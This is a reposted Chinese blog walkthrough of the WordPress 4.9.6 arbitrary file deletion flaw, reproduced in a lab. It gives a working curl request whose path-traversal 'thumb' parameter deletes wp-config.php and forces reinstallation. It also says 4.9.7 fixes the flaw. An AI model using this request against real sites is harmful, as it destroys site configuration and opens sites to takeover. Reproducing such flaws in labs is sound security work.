WordPress 4.9.6任意文件删除漏洞利用

WordPress是目前网络上最受欢迎的CMS。约有30%的网站都在使用它。这种广泛的采用,也使其成为了网络犯罪分子非常感兴趣的一个目标.RIPS团队在7个月前,向WordPress安全团队报告了这个漏洞,但至今发稿前依然没有得到修复。

4.9.7 已更新修复此漏洞

受影响的版本

WordPress版本(包括当前的4.9.6版本)

比较鸡肋的是如果要利用该漏洞,攻击者需要作者权限登陆账号和删除媒体文件的权限。我根据谷歌搜索前三页WordPress站点,通过注册页面登陆发现权限很低;没有上传图片的权限。导致没有利用成功; 所以说WordPress安全团队迟迟没有修复漏洞,肯定认为这只是低危漏洞

利用

  1. 搭建环境

WordPress 4.9.6

安装成功后,在后台添加一个“作者”权限账户 “test” 只有写作功能,用于测试

2.添加媒体,上传一张图片

3.在页面源码中找出 _wpnonce 值,通过页面源码查找 值为“5df9982e4e”

4.发送请求

curl -v 'http://192.168.0.9/wordpress/wp-admin/post.php?post=9' -H 'Cookie: ****' -d 'action=editattachment&_wpnonce=5df9982e4e&thumb=../../../../wp-config.php'

Cookie 可通过 burpsuite 截取

发送命令之后回显成功,点击页面中的永久删除;再点击 burpsuite 中的 intercept is on 取消即可删除成功直接跳转安装页面

本文章转载来自@安全猎人

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏小白课代表

手机迅雷『下载安装删除导出备份』的一站式使用说明。

费尽心思寻找下载链接,安装好以后又有证书随时失效的风险,资料不能导出,今天,课代表就带大家解决这一系列问题。

37620
来自专栏张戈的专栏

WordPress评论滑动/拉链解锁myQaptcha修改为自动提交的方法

自从肉牛、钢材等垃圾评论泛滥,很多朋友都用上了各种评论验证方案,其中一个比较惹眼的就是张戈博客目前在用的 myQaptcha 滑动解锁。 ? 很久之前张戈博客已...

37050
来自专栏Python攻城狮

Ajax-数据异步交互1.Ajax简介2.AJAX 实例

AJAX = 异步 JavaScript 和 XML。 AJAX 是一种用于创建快速动态网页的技术。 通过在后台与服务器进行少量数据交换,AJAX 可以使网...

27830
来自专栏小白课代表

OneTab – 帮你节省 95% 的内存,让 Chrome / Firefox 重焕新生

浏览器作为我们上网的窗口,在我们的工作学习中担任着非常重要的角色,但人们想要浏览什么东西的时候,往往都是打开浏览器,打开网站,搜索关键词,尤其是你想要查某样东西...

38050
来自专栏杨逸轩 ' sBlog

为你的 typecho 博客开启 gzip 压缩功能

27790
来自专栏前端笔记

【新手科普】windows和wordpress的“上帝模式”你知道嘛?

一、Windows 上帝模式 这个玩意出来很久很久了,估计不用多说,知道的同学还是挺多的,不知道的也只要百度一下,你就知道了。 方法很简单,在 Windows ...

27450
来自专栏deepcc

链接中 href='#' 和 href='###' 的区别以及优缺点

355120
来自专栏小勇DW3

Spring Boot应用总结更新

SpringBoot的产生背景伴随着微服务,微服务的相关概念参考上一篇的博客,分布式架构理论;

15220
来自专栏FH云彩

Win8快捷键

10930
来自专栏跟着阿笨一起玩NET

多台电脑共享一套鼠标键盘的免费方法

本文转载:http://www.cnblogs.com/fangpage/archive/2011/07/22/inputdirector.html

2.4K10

扫码关注云+社区

领取腾讯云代金券